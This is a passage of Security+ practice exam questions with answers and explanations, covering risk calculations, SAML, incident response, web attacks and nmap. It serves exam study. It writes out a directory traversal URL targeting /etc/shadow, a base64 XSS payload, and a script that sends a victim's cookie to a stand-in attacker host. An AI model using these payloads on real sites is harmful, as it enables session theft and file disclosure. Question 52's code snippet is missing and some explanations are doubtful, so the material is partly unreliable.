A. Create and run a PowerShell script to search for the specific patch in question
B. Use an endpoint manager to validate patch status for each machine on the domain
C. Conduct a registry scan of each workstation to validate the patch was installed
D. Check the Update History manually

A

B. Use an endpoint manager to validate patch status for each machine on the domain

Explanation:
OBJ-3.2: Microsoft Endpoint Configuration Manager (MECM, formerly SCCM) provides remote control, patch management, software distribution, operating system deployment, network access protection, and hardware and software inventory, so it can report the patch status of every domain-joined workstation from one console. In an Azure environment, you can also use the Update Compliance tool to monitor Windows Update status, Windows Defender antivirus status, and overall patching status across all of your Windows 10 workstations. In previous Windows versions you could use the Microsoft Baseline Security Analyzer (MBSA), but it is no longer supported on Windows 10. A PowerShell script may be a reasonable option, but it would take a knowledgeable analyst to write the script and run it across the network, whereas using the endpoint manager is easier and quicker. Manually checking the Update History or registry of each system could also work, but that is very time-consuming and inefficient, especially if Ryan supports a large network.

23
Q

Fail to Pass Systems has recently moved its corporate offices from France to Westeros, a country with no meaningful privacy regulations. The marketing department believes that this move will allow the company to resell all of its customer’s data to third-party companies and shield the company from any legal responsibility. Which policy is violated by this scenario?

A. Data sovereignty
B. Data enrichment
C. Data limitation
D. Data minimization

A

A. Data sovereignty

Explanation:
While the fictitious Westeros may have no privacy laws or regulations, the laws of the countries where the company’s customers reside may still retain sovereignty over the data obtained from those regions during the company’s business there. This is called Data Sovereignty. Data sovereignty refers to a jurisdiction (such as France or the European Union) preventing or restricting processing and storage from taking place on systems that do not physically reside within that jurisdiction. Data sovereignty may demand certain concessions on your part, such as using location-specific storage facilities in a cloud service. Fail to Pass Systems will likely face steep fines from different regions if they go through with their plan to sell all of their customers’ data to the highest bidders. Fail to Pass Systems may even be blocked from communicating with individual regions. Although Data minimization and data limitation policies may be violated depending on the company’s internal policies, these policies are not legally binding like the provisions of GDPR are. Data enrichment means that the machine analytics behind the view of a particular alert can deliver more correlating and contextual information with a higher degree of confidence, both from within the local network’s data points and from external threat intelligence.

24
Q

Dion Training Solutions is currently calculating the risk associated with building a new data center in a hurricane-prone location. The data center would cost $3,125,000 to build and equip. Based on their assessment of the history of the location, a major hurricane occurs every 20 years and their data center would risk losing 60% of its value due to downtime and possible structural damages. If the data center is built in this location, what is the annual rate of occurrence for this data center?

A. 0.03
B. 0.60
C. 0.05
D. 0.20

A

C. 0.05

Explanation:
OBJ-4.1: The annual rate of occurrence is 0.05 since one incident occurs every 20 years (1/20 is 0.05). The annual rate of occurrence (ARO) is the number of times in a year that a single event occurs. If the number of times an event occurs is counted over multiple years, then the number is divided by the number of years to calculate the ARO. If the number of times is counted monthly, then it is multiplied by 12 to annualize it. For example, if the number of occurrences was 3 times per month, then the ARO would be 36 times per year (3 occurrences x 12 months in a year).

25
Q

A company-wide audit revealed employees are using company laptops and desktops for personal use. To prevent this from occurring, in which document should the company incorporate the phrase “Company-owned IT assets are to be used to perform authorized company business only”?

A. AUP
B. MOU
C. SLA
D. NDA

A

A. AUP

Explanation:
OBJ-4.1: An acceptable use policy dictates what types of actions an employee can or cannot do with company-issued IT equipment. An acceptable use policy (AUP) is a set of rules applied by the owner, creator, or administrator of a network, website, or service that restricts how the network, website, or system may be used and sets guidelines as to how it should be used. A memorandum of understanding (MOU) is important because it defines the responsibilities of each party in an agreement, provides the scope and authority of the agreement, clarifies terms, and outlines compliance issues. A non-disclosure agreement (NDA) is a legal contract or part of a contract between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share for certain purposes but wish to restrict access to. A service level agreement (SLA) is a commitment between a service provider and a client for particular aspects of the service, such as quality, availability, or responsibilities.

26
Q

An organization wants to improve its ability to detect the infiltration of servers in a DMZ or screened subnet. The network’s IPS/IDS solutions are currently located at the edges between the DMZ and Untrust zones and between the DMZ and Trust zones. Which of the following could increase visibility inside the DMZ or screened subnet?

A. Honeypot
B. NAC server
C. VPN headend
D. Layer 7 firewall

A

D. Layer 7 firewall

Explanation:
OBJ-1.1: Layer 7 firewalls operate at the application layer. These devices allow you to implement security at a more granular level. A layer 7 firewall can be configured to log all of the details for data entering and leaving the DMZ or screened subnet. A network access control (NAC) server is used to unify your endpoint security technology and user/system authentication. A NAC server is used for authentication, and would not provide additional visibility into the DMZ or screened subnet. A honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. A honeypot will detect attacks against itself, but not the other servers in the DMZ or screened subnet. A VPN headend establishes multiple encrypted VPN tunnels at the same time and provides a secure and encrypted connection between different VPN nodes. A VPN headend would not provide any additional visibility into the DMZ or screened subnet.

27
Q

Which of the following does a User-Agent request a resource from when conducting a SAML transaction?

A. Identity provider
B. Single sign on
C. Relying party
D. Service provider

A

D. Service provider

Explanation:
OBJ-1.5: Security Assertion Markup Language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal’s User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal’s credentials if not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

28
Q

During your review of the firewall logs, you notice that an IP address from within your company’s server subnet had been transmitting between 125 and 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident?

A. Forensic review of the server required fallback to a less efficient service
B. IP Addresses and other network related configurations were exfiltrated
C. PII of company employees and customers was exfiltrated
D. Raw financial information about the company was accessed

A

C. PII of company employees and customers was exfiltrated

Explanation:
OBJ-2.7: If the PII (Personally Identifiable Information) of the company’s employees or customers were exfiltrated or stolen during the compromise, this would increase the incident’s impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact of the assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company’s size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.

29
Q

Your company is adopting a new BYOD policy for tablets and smartphones. Which of the following would allow the company to secure the sensitive information on personally owned devices and provide the ability to remotely wipe corporate information without affecting the user’s personal data?

A. Touch ID
B. Face ID
C. Long and complex passwords
D. Containerization

A

D. Containerization

Explanation:
OBJ-3.1: Containerization is the logical isolation of enterprise data from personal data while co-existing in the same device. The major benefit of containerization is that administrators can only control work profiles that are kept separate from the user’s personal accounts, apps, and data. This technology creates a secure vault for your corporate information. Highly targeted remote wiping is supported with most container-based solutions.

30
Q

You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions?

A. Restrict host access to peripheral protocols like USB or Bluetooth
B. Disable unused user accounts
C. Review and enhance patch management policies
D. Proactively sanitize and reimage all of your routers and switches

A

D. Proactively sanitize and reimage all of your routers and switches

Explanation:
OBJ-3.2: Since your team could not determine the root cause of the compromise, you would most likely conduct system and network hardening actions as part of the recovery and remediation. The only option that is not considered a hardening action is proactively sanitizing and reimaging your routers and switches. If you performed this action, you could have unwanted disruptive effects on the company. Instead, it would be more beneficial to increase monitoring of the devices to ensure they are not compromised. Proactively sanitizing and reimaging all of the routers and switches would be a large undertaking. Without evidence suggesting that such an approach is warranted, you would be wasting a lot of time and money. The other options presented are the best security practices to prevent future compromises. Reimaging the network devices without knowing the root cause will likely be ineffective in securing the network.

31
Q

An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building’s main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?

A. Tailgating
B. Shoulder surfing
C. Social engineering
D. Spoofing

A

A. Tailgating

Explanation:
OBJ-2.6: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Spoofing is the act of disguising a communication from an unknown source as being from a known, trusted source.

32
Q

What tool is used to collect wireless packet data?

A. Nessus
B. John the Ripper
C. Netcat
D. Aircrack-ng

A

D. Aircrack-ng

Explanation:
OBJ-2.9: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.

33
Q

Jonathan is trying to open an encrypted and digitally-signed email he sent 3 years ago. Last month, he was issued a new public/private key pair since his old key pair had expired. When attempting to open some encrypted and digitally-signed emails he sent last week, he can read them without any issues. Which of the following errors is causing Jonathan’s issues with reading the email from 3 years ago?

A. Mismatched key error
B. Incorrect name error
C. Rekeying error
D. Compromised key pair

A

A. Mismatched key error

Explanation:
OBJ-3.7: The reason Jonathan can no longer read those encrypted emails is that his previous public/private key pair has expired and is no longer valid for use. His email client is trying to decrypt those emails using his new public/private key pair, causing a mismatched key error. A mismatched key error occurs if the wrong public/private key pair is used to decrypt data. The most common forms of this error are displayed as “key mismatch” or “X509_check_private_key”. Rekeying is the process of changing an individual key during a communication session. Most communication protocols use session key rekeying to protect the data being transmitted. A rekeying is normally triggered based on the volume of data communicated or the amount of time since the last rekeying. A compromised or exposed key occurs when unauthorized access to a symmetric or private key is gained. When a key is compromised or exposed, it must be revoked and replaced. An incorrect name error is generated when the certificate’s CN name does not match the FQDN of the system that is using the certificate. For example, if the certificate is issued to diontraining.com but is being presented for www.diontraining.com or yourcyberpath.com, it will generate an incorrect name error.

34
Q

You are configuring the ACL for the network perimeter firewall. You have just finished adding all the proper allow and deny rules. What should you place at the end of your ACL rules?

A. An implicit deny statement
B. A time of day restriction
C. An implicit allow statement
D. An SNMP deny string

A

A. An implicit deny statement

Explanation:
According to the best practices of firewall configurations, you should include an implicit deny at the end of your ACL rules. This will ensure that anything not specifically allowed in the rules above is blocked. Using an implicit allow is a bad security practice since it will allow anything into the network that is not specifically denied. While the time of day restrictions can be useful, they are not required for all network implementations.

35
Q

Dion Training is currently estimating the next fiscal year’s cybersecurity incident response budget. Jason has calculated an asset value of $75,000 for the server clusters that run the company’s practice exams for students. Based on his analysis, he believes that a one-hour denial of service attack on this server will occur twice every three years and that the risk exposure factor is 90% during the attack. What is the single loss expectancy (SLE) when a DDoS attack occurs against the practice exam server cluster?

A. $67,500
B. $75,000
C. $50,000
D. $45,000

A

A. $67,500

Explanation:
The single loss expectancy (SLE) is the amount that would be lost in a single occurrence of a particular risk factor. To calculate the single loss expectancy (SLE), you multiply the asset value (AV) by the exposure factor (EF). Since you are asked to calculate the single loss expectancy, you do not need to calculate the annual rate of occurrence (2/3 or 66%) nor the annualized loss expectancy ($45,000). SLE = AV x EF = $75,000 x 0.90 = $67,500

36
Q

Following an incident, the incident response team has generated many recommendations for additional controls and items to be purchased to prevent future recurrences. Which of the following approaches best describes what the organization should do next?

A. Contract an outside security consultant to provide an independent assessment of the network and outsource the remediation efforts
B. Conduct a cost/benefit analysis of each recommendation against the company’s current fiscal posture
C. Submit a prioritized list with all of the recommendations for review, procurement and installation
D. Immediately procure and install all of them because the adversary may reattack at any time

A

C. Submit a prioritized list with all of the recommendations for review, procurement and installation

Explanation:
Since an incident has just occurred, it is important to act swiftly to prevent a reoccurrence. The organization should still take a defined and deliberate approach to choosing the proper controls and risk mitigations. Therefore, execution through a rational business management process is the best approach, including creating a prioritized list of recommendations. Once this list has been created, the organization can conduct a cost/benefit analysis of each recommendation and determine which controls and items will be implemented in the network based upon resource availability in terms of time, person-hours, and money. This process does not need to be a long-term study or filled with complexity. Instead, it should be rapidly conducted due to the probability that an attacker may compromise the network again.

37
Q

A recently hired security employee at a bank was asked to perform daily scans of the bank’s intranet to look for unauthorized devices. The new employee decides to create a script that scans the network for unauthorized devices every morning at 2:00 am. Which programming language would work best to create this script?

A. PHP
B. Python
C. C#
D. ASP.NET

A

B. Python

Explanation:
OBJ-2.6: Python is a commonly used scripting language used in cybersecurity. Python is a general-purpose programming language that can develop many different kinds of applications. It is designed to be easy to read, and the programs use fewer lines of code compared to other programming languages. The code runs in an interpreter. Python is preinstalled on many Linux distributions and can be installed on Windows. Python scripts are saved using the .py extension. PHP is used as a scripting language for web applications. C# and ASP.NET are both compiled languages, not scripting languages.

38
Q

You are working as a network engineer for a smartphone company that wants to begin offering contactless payment options with their devices. Which of the following technologies should they embed in their handsets to support contactless payments like Apple Pay, Samsung Pay, or Google Pay?

A. WiFi
B. Bluetooth
C. NFC
D. RFID

A

C. NFC

Explanation:
OBJ-3.1: Near-Field Communication (NFC) is a set of communication protocols for communication between two electronic devices over a distance of 4 cm or less. NFC offers a low-speed connection with a simple setup that can be used to bootstrap more capable wireless connections. NFC is used with payment systems like Apple Pay, Samsung Pay, and Google Pay since it supports two-way communication, unlike RFID which only supports one-way data transfers. Radio-frequency identification (RFID) uses electromagnetic fields to automatically identify and track tags attached to objects. Bluetooth is a short-range wireless technology standard that is used for exchanging data between fixed and mobile devices over short distances using UHF radio waves in the ISM band from 2.402 GHz to 2.48 GHz and building personal area networks. Bluetooth is often used to create peer-to-peer connections between two devices for a distance of up to 10 meters. Wi-Fi is a family of wireless network protocols, based on the IEEE 802.11 family of standards, which are commonly used for local area networking of devices and Internet access, allowing nearby digital devices to exchange data by radio waves. Wi-Fi can provide high speeds and cover a maximum distance of up to 150 meters.

39
Q

As a SOC analyst, you receive an alert concerning a dramatic slowdown affecting the company’s e-commerce server due to the load balancer’s critical failure. Your company depends on online sales for all of its business, and you know the immediate impact of this event will be a loss of sales. Which of the following is an appropriate classification of the impact in terms of the total impact and notification requirements? (SELECT THREE)

A. Total impact includes damages to the company’s reputation
B. Notification of external authorities is required
C. Total impact includes a loss of customers
D. Organization impact is anticipated
E. Localized impact is anticipated
F. Notification of external authorities is optional

A

C. Total impact includes a loss of customers
D. Organization impact is anticipated
F. Notification of external authorities is optional

Explanation:
OBJ-4.1: Since online sales are critical to business operations, the impact would be categorized as organizational and not localized. While the immediate impact is a loss of sales due to the slow servers causing customer frustration and abandoned carts, the longer-term impact could include losing customers who will never return. It is unlikely to include damages to the company’s reputation over this event, since it isn’t a major trust and security issue like a data breach. In terms of notification requirements, it is optional to inform external authorities since there is no evidence of a crime.

40
Q

What containment technique is the strongest possible response to an incident?

A. Segmentation
B. Isolating affected systems
C. Enumeration
D. Isolating the attacker

A

B. Isolating affected systems

Explanation:
OBJ-2.7: Isolation involves removing an affected component from whatever larger environment it is a part of. This can be anything from removing a server from the network after it has been the target of a DoS attack to placing an application in a sandbox virtual machine (VM) outside of the host environment it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term in use, but it would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication with and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.

41
Q

You have been asked to select the best endpoint security control to meet the following requirement. The endpoint is a user workstation that is used by a typical office employee to conduct basic office functions like word processing and creating spreadsheets. Your organization wants to be able to determine if any unexpected behavior occurs on the endpoint or the system state is changed. Which of the following endpoint security controls would create alerts based on signature rules matching known malicious activity on the endpoint?

A. Endpoint detection and response (EDR)
B. Host based intrusion detection systems (HIDS)
C. Host based firewall
D. User and entity behavior analytics (UEBA)

A

B. Host based intrusion detection systems (HIDS)

Explanation:
OBJ-3.2: A host-based intrusion detection system (HIDS) is a type of IDS that monitors a computer system for unexpected behavior or drastic changes to the system’s state. Host-based intrusion detection systems normally rely on signature rules to identify potentially malicious activity on the endpoint and then create alerts based on the rule that was matched. A host-based firewall is a firewall implemented as application software running on the host that provides sophisticated filtering of network traffic and can also block processes at the application level. Endpoint detection and response (EDR) is a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats. User and entity behavior analytics (UEBA) is a type of cybersecurity application or appliance that identifies anomalous or malicious behavior by using machine learning and statistical analysis to identify deviations from normally established baselines and patterns of activity.

42
Q

During a security audit, you discovered that customer service employees have been sending unencrypted confidential information to their personal email accounts via email. What technology could you employ to detect these occurrences in the future and send an automated alert to the security team?

A. DLP
B. MDM
C. UTM
D. SSL

A

A. DLP

Explanation:
OBJ-1.1: Data loss prevention (DLP) software detects potential data breaches/data exfiltration transmissions and prevents them by monitoring, detecting, and blocking sensitive data while in use, in motion, and at rest. This can be configured to detect and alert on future occurrences of this issue. Secure Socket Layer (SSL) is a distraction in this question since the question asks about information being sent unencrypted. The connection between the client and the email server could be encrypted using SSL. However, the information is still being sent to an employee’s personal email account, which equates to a loss of control over the company’s confidential data. Mobile Device Management (MDM) software is used for the configuration and securing of mobile devices like smartphones and tablets. Unified Threat Management (UTM) is a device that combines the functions of a firewall, anti-malware solution, and IDS into a single piece of hardware. Some UTMs may provide DLP functionality, but DLP is the better answer to this question.

43
Q

Dion Training has implemented its own root CA to issue digital certificates to its users. Each digital certificate is valid for 3 years by default, but if a user’s account is disabled then their digital certificate must also be revoked. Which of the following would allow a client to request the status of a digital certificate to determine if it was revoked without downloading the full list of certificate statuses?

A. HSTS
B. CRL
C. OCSP
D. HPKP

A

C. OCSP

Explanation:
OBJ-3.5: The online certificate status protocol (OCSP) allows clients to request the status of a digital certificate and to check whether it is revoked. A certificate revocation list (CRL) is a list of every digital certificate that has been revoked before its expiration date. HTTP Public Key Pinning (HPKP) is a certificate pinning method that embeds the certificate data in the HTTP header sent from a web server to a web browser. HTTP Strict Transport Security (HSTS) is configured as a response header on a web server and notifies a browser to connect to the requested website using HTTPS only. HSTS helps prevent on-path and downgrade attacks.

44
Q

Dion Training is concerned with the possibility of employees accessing another user’s workstation in secured areas without their permission. Which of the following would BEST be able to prevent this from happening?

A. Require a username and password for user logins
B. Require biometric identification for user logins
C. Install security cameras in secure areas to monitor logins
D. Enforce a policy that requires passwords to be changed every 30 days

A

B. Require biometric identification for user logins

Explanation:
OBJ-1.5: The BEST choice is to implement biometric identification for user logins, such as a fingerprint reader or a retina scanner. This would ensure that even if an employee could discover another employee’s username and password, they would be prevented from logging into the workstation without the employee’s finger or eye to scan. Enforcing short password retention can limit the possible damage when a password is disclosed, but it won’t prevent a login during the valid period. Security cameras may act as a deterrent or detective control, but they cannot prevent an employee from logging into the workstation as another employee. Security cameras could be used to determine who logged in after the fact, though.

45
Q

Which of the following functions is not provided by a TPM?

A. User authentication
B. Remote attestation
C. Random number generation
D. Secure generation of crypto keys
E. Sealing
F. Binding

A

A. User authentication

Explanation:
OBJ-3.2: User authentication is performed at a much higher level in the operating system. Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. The chip includes multiple physical security mechanisms to make it tamper-resistant, and malicious software cannot tamper with the security functions of the TPM. The TPM provides random number generation, secure generation of cryptographic keys, remote attestation, binding, and sealing functions securely.

46
Q

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of exploit are you attempting?

A. Buffer overflow
B. XML injection
C. Directory traversal
D. SQL Injection

A

C. Directory traversal

Explanation:
OBJ-2.5: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input.

47
Q

Which of the following emerging technologies will render modern cryptographic techniques that rely on the difficulty of solving complex math problems obsolete?

A. Distributed consensus
B. Artificial intelligence
C. Quantum computing
D. Homomorphic encryption

A

C. Quantum computing

Explanation:
OBJ-1.8: Quantum computing combines physics, mathematics, and quantum mechanics to exploit the collective properties of quantum states. Quantum computing will render cryptography that relies on the difficulty of solving difficult math problems rapidly obsolete. Distributed consensus is used in a distributed or decentralized system to solve a particular computation to maintain the overall integrity of the distributed system or blockchain. Artificial Intelligence is the science of creating machines to develop problem-solving and analysis strategies without significant human direction or intervention. Homomorphic encryption is a method of encryption that allows the computation of certain fields in a dataset without first decrypting the dataset.

48
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnSSBsb3ZlIERpb24gVHJhaW5pbmcnKTwvc2NyaXB0Pg==. What type of attack was attempted?

A. SQL Injection
B. XSS
C. XML Injection
D. Password spraying

A

B. XSS

Explanation:
OBJ-2.2: This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information that users enter into their web browser to be sent to the attacker. In this example, everything from ?param onward is part of the attack. You can see the base64 encoded string of PHNjcmlwdD5hbGVydCgnSSBsb3ZlIERpb24gVHJhaW5pbmcnKTwvc2NyaXB0Pg== being used. While you could not convert it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection nor an XML injection based on your studies. It is also not an attempt to conduct password spraying by logging into different usernames with the same password. So, by process of elimination, you can determine this is an XSS attack. If you did have a base64 decoder, you would have found that the parameter being passed would translate to <script>alert('I love Dion Training')</script>, which is a simple method to cause your web browser to create a popup that displays the text “I love Dion Training.” If you attempt to load this URL in your browser, it may or may not function depending on your browser’s security.

49
Q

You have been asked to help design a new architecture for Dion Training’s website. The current architecture involves a single server that hosts the website in its entirety. The company’s newest course has been creating a lot of interest on social media. The CIO is concerned that the single server will not be able to handle the increased demand that could result from this increased publicity. What technology should you implement in the new architecture to allow multiple web servers to serve up the courses and meet this expected increase in demand from new students?

A. Load Balancer
B. RAID
C. DLP
D. VPN Concentrator

A

A. Load Balancer

Explanation:
OBJ-1.1: A load balancer allows for high availability and the ability to serve increased demand by splitting the workload across multiple servers. RAID is a high availability technology that allows for multiple hard disks to act logically act as one to handle more throughput, but this will not solve the higher demand on the server’s limited processing power as a load balancer would. A VPN concentrator is a networking device that provides the secure creation of VPN connections and the delivery of messages between VPN nodes. A data loss prevention (DLP) system is focused on ensuring that intellectual property theft does not occur. Therefore, a DLP will not help meet the increased demand from new students.

50
Q

You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan, but you don’t have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation?

A. nmap -sX
B. nmap -sS
C. nmap -sT
D. nmap -O

A

C. nmap -sT

Explanation:
OBJ-2.4: The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you do not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a full connection with the target machine by issuing the connect system call instead of directly crafting the packets of a SYN scan. Normally, a faster scan using the -sS (SYN scan) flag is conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct an Xmas scan, in which the FIN, PSH, and URG flags are set on the probe packets. The -O flag would conduct an operating system detection scan of the target system.

51
Q

Which of the following access control models is the most flexible and allows the resource owner to control the access permissions?

A. DAC
B. ABAC
C. RBAC
D. MAC

A

A. DAC

Explanation:
OBJ-1.5: Discretionary access control (DAC) stresses the importance of the owner. The original creator of the resource is considered the owner and can then assign permissions and ownership to others. The owner has full control over the resource and can modify its ACL to grant rights to others. This is the most flexible model and is currently implemented widely in Windows, Unix, Linux, and macOS systems.

52
Q

You are conducting static analysis of an application’s source code and see the following:

Based on this code snippet, which of the following security flaws exists in this application?

A. Improper input validation
B. Race condition
C. Insufficient logging and monitoring
D. Improper error handling

A

A. Improper input validation

Explanation:
OBJ-1.3: Based on this code snippet, the application is not utilizing input validation. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could input the following for a value of “ID”: '><script>document.location='http://www.malicious-website.com/cgi-bin/cookie.cgi?Foo='+document.cookie</script>. This could cause the victim ID to be sent to “malicious-website.com” where additional code could be run, or the session can then be hijacked. Based on the code snippet provided, we have no indications of the level of logging and monitoring being performed, nor if proper error handling is being conducted. A race condition is a software vulnerability in which the resulting outcome of execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.

53
Q

Dion Training requires that the staff simulate their response to a potential data breach. During this simulation, the staff gathers in the conference room and discusses each action they would take as part of their response. This information is then analyzed to ensure the company’s data breach response playbook is up to date and would work properly when needed. Which of the following best describes what the staff did?

A. Tabletop exercise
B. Business impact analysis
C. Incident response
D. Disaster recovery planning

A

A. Tabletop exercise

Explanation:
OBJ-4.4: A tabletop exercise involves gathering the key staff of an organization and discussing their actions during a potential unwanted event. The staff could further be divided into a blue team and a red team, with half playing the role of defenders and the other half playing the adversary’s role. Tabletop exercises are less expensive to conduct than a full-scale red team event or penetration test. Tabletop exercises are a great way to exercise existing procedures and response plans to identify any weaknesses within them.

54
Q

What is used to define how much bandwidth can be used by various protocols on the network?

A. High availability
B. Load balancing
C. Traffic shaping
D. Fault tolerance

A

C. Traffic shaping

Explanation:
OBJ-1.2: Traffic shaping, also known as packet shaping, is the manipulation and prioritization of network traffic to reduce the impact of heavy users or machines from affecting other users. Traffic shaping is used to optimize or guarantee performance, improve latency, or increase usable bandwidth for some kinds of packets by delaying other kinds. High availability (HA) is a component of a technology system that eliminates single points of failure to ensure continuous operations or uptime for an extended period. Fault tolerance refers to the ability of a system (computer, network, cloud cluster, etc.) to continue operating without interruption when one or more of its components fail. Load balancing refers to the process of distributing a set of tasks over a set of resources, intending to make their overall processing more efficient. Load balancing can optimize the response time and avoid unevenly overloading some compute nodes while other compute nodes are left idle.

55
Q

A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to a suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?

A. Hardening the DEV_SERVER7 server
B. Conduct a data criticality and prioritization analysis
C. Conduct a Nessus scan on the FIREFLY server
D. Logically isolate the PAYROLL_DB server from the production network

A

B. Conduct a data criticality and prioritization analysis

Explanation:
OBJ-2.7: While the payroll server could be assumed to hold PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and DION, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn’t contain their credit card processing systems, which would be a more lucrative target for APT 38 than the PAYROLL_DB? The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don’t know which data they should focus on protecting or where the attacker is currently.

56
Q

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?

A. SNMP
B. NetFlow
C. MIB
D. SMTP

A

A. SNMP

Explanation:
OBJ-1.1: Simple Network Management Protocol (SNMP) is commonly used to gather information from routers, switches, and other network devices. It provides information about a device’s status, including CPU and memory utilization, and many other useful details about the device. NetFlow provides information about network traffic. A management information base (MIB) is a database used for managing the entities in a communication network. The Simple Mail Transfer Protocol (SMTP) is a communication protocol for electronic mail transmission.

57
Q

What type of cloud model would allow the sharing of resources by multiple organizations to create a service that benefits all of its members?

A. Private Cloud
B. Public Cloud
C. Hybrid Cloud
D. Community Cloud

A

D. Community Cloud

Explanation:
OBJ-1.6: A community cloud in computing is a collaborative effort in which infrastructure is shared between several organizations from a specific community with common concerns, whether managed internally or by a third party and hosted internally or externally. Community Cloud is a hybrid form of private cloud. They are multi-tenant platforms that enable different organizations to work on a shared platform. Community Cloud may be hosted in a data center, owned by one of the tenants, or by a third-party cloud services provider and can be either on-site or off-site. A public cloud contains services offered by third-party providers over the public Internet and is available to anyone who wants to use or purchase them. They may be free or sold on-demand, allowing customers to pay only per usage for the CPU cycles, storage, or bandwidth they consume. A private cloud contains services offered either over the Internet or a private internal network and only to select users instead of the general public. A hybrid cloud is a cloud computing environment that uses a mix of on-premises, private cloud, and third-party public cloud services with orchestration between these platforms. This typically involves a connection from an on-premises data center to a public cloud.

58
Q

Dion Training has recently set up some virtual servers in a virtual private cloud (VPC) with a cloud service provider. These servers need to connect to services outside the VPC while still preventing external services from initiating a connection with those virtual servers. Which of the following services should be implemented to meet these security requirements?

A. API Gateway
B. XML Gateway
C. NAT Gateway
D. VPN Gateway

A

C. NAT Gateway

Explanation:
